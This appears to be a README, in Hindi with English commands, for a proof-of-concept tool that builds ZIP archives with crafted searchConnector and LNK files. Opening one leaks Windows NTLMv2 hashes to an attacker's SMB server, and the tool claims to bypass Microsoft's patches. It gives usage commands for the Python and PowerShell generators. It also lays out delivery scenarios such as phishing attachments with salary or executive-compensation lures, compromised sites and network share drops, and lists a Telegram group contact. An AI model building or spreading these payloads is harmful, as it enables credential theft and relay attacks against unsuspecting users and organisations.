
विंडोज़ फ़ाइल एक्सप्लोरर ज़ीरो क्लिक NTLMv2-SSP हैश प्रकटीकरण
वल्नरेबिलिटी प्रदर्शन देखने के लिए ऊपर दी गई छवि पर क्लिक करें
मूल सुरक्षा समस्या Windows Shell द्वारा प्रीव्यू ऑपरेशन के दौरान विशिष्ट फ़ाइल प्रारूपों में एम्बेडेड UNC पाथों के स्वचालित प्रोसेसिंग में निहित है। जब उपयोगकर्ता विशेष रूप से तैयार की गई फ़ाइलों वाले ZIP आर्काइव खोलते हैं, तो Windows Explorer उपयोगकर्ता की सहमति के बिना UNC पाथों को स्वचालित रूप से रिज़ॉल्व करता है, SMB प्रमाणीकरण प्रयासों की शुरुआत करता है और NTLMv2-SSP हैश को हमलावर-नियंत्रित सर्वरों पर उजागर करता है।
फ़ाइल: ntlm-disclosure-poc.py
यह प्रारंभिक इम्प्लीमेंटेशन Windows Search Connector (.searchConnector-ms) फ़ाइलों का शोषण करता है, जो XML-आधारित कॉन्फ़िगरेशन फ़ाइलें हैं जो Windows Explorer के लिए खोज स्थानों को परिभाषित करती हैं। वल्नरेबिलिटी तब ट्रिगर होती है जब Windows ZIP आर्काइव प्रीव्यू ऑपरेशन के दौरान simpleLocation एलिमेंट में एम्बेडेड UNC पाथ को स्वचालित रूप से प्रोसेस करता है।
तकनीकी विशेषताएँ:
searchConnectorDescription एलिमेंट्स में UNC पाथ एम्बेडिंगफ़ाइल: patch_bypass.ps1
यह उन्नत तकनीक LNK फ़ाइल गुणों का लाभ उठाकर Microsoft के प्रारंभिक पैच को संबोधित करती है। यह हमला ZIP फ़ाइल प्रीव्यू के दौरान आइकन मेटाडेटा लाने और टारगेट पाथों को रिज़ॉल्व करने के Windows Explorer व्यवहार का शोषण करता है, साथ ही सावधानीपूर्वक गुण कॉन्फ़िगरेशन के माध्यम से ज़ीरो-क्लिक शोषण वेक्टर को बनाए रखता है।
तकनीकी विशेषताएँ:
TargetPath प्रॉपर्टी में UNC पाथ वाली LNK फ़ाइलें3.6+colorama5.1+Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser# Basic usage
python ntml-disclosure-poc.py 192.168.1.100
# With custom output file
python ntml-disclosure-poc.py 192.168.1.100 -o some_data.zip
# Example output
[+] Listener: 192.168.1.100
[*] Resource path: \\192.168.1.100\sharedir
[*] COMPLETE Package: Project_20241125_143022.zip
[*] Output: PATH\Project_20251123_175037.zip
Parameters
target (required): Target IP address or hostname
-o, --output: Custom output filename for ZIP package
# Basic usage - LNK file auto-removed
.\bypass.ps1 -IP 192.168.1.100
# Keep LNK file for external distribution
.\bypass.ps1 -IP 192.168.1.100 -KeepLnk
# Custom lure name and share
.\bypass.ps1 -IP 192.168.1.100 -Share documents -File budget.xlsx -Lure FileName" -KeepLnk
# Specify output directory
.\bypass.ps1 -IP 192.168.1.100 -OutDir "C:\Payloads" -KeepLnk
Parameters
-IP (required): Target SMB server IP address
-Share: SMB share name (default: 'share')
-File: Target filename (default: 'payload.exe')
-Lure: Social engineering filename (default: 'Your_File_For_Payload_Here')
-OutDir: Output directory (default: current directory)
-KeepLnk: Preserve LNK file after ZIP creation
| वेक्टर | ट्रिगर तंत्र | उपयोगकर्ता इंटरैक्शन | पैच स्थिति |
|---|---|---|---|
| 🔗 SearchConnector | XML पार्सिंग + UNC रिज़ॉल्यूशन | ZIP खोलना | 🛡️ पैच्ड |
| 📎 LNK TargetPath | आइकन मेटाडेटा फ़ेच | ZIP खोलना | 🔴 सक्रिय |
graph TD
A[🔴 CVE-2025-24054<br/>Initial Vulnerability] --> B[🛡️ Microsoft Patch]
B --> C[🟠 CVE-2025-50154<br/>Bypass #1]
C --> D[🛡️ Microsoft Patch]
D --> E[🟡 CVE-2025-59214<br/>Bypass #2]
E --> F[🔴 Current State<br/>Active Exploitation]
style A fill:#ffcccc
style C fill:#ffddcc
style E fill:#ffffcc
style F fill:#ccffcc
📨 परिदृश्य 1: डायरेक्ट ZIP वितरण
# Create ZIP payload
.\bypass.ps1 -IP 192.168.1.100 -Lure "Salary_Report_Q4_2025"
# Distribution vectors:
# - 📧 Email attachments with social engineering lures
# - ☁️ Compromised file sharing services
# - 🌐 Network share drops in enterprise environments
🔄 परिदृश्य 2: LNK फ़ाइल स्थानांतरण
# Create and preserve LNK file for multi-host deployment
.\bypass.ps1 -IP 192.168.1.100 -Lure "Project_Documentation" -KeepLnk
# Cross-host deployment:
copy-item "Project_Documentation.lnk" "\\remote-server\share\"
# Web-based distribution via compromised sites
🎯 परिदृश्य 3: लक्षित सोशल इंजीनियरिंग
.\bypass.ps1 -IP 192.168.1.100 -Share "HR_Documents" -File "compensation_review.xlsx" -Lure "Executive_Compensation_2025" -KeepLnk
- Group & Contact: t.me/initial_persistence
- Email: [email protected]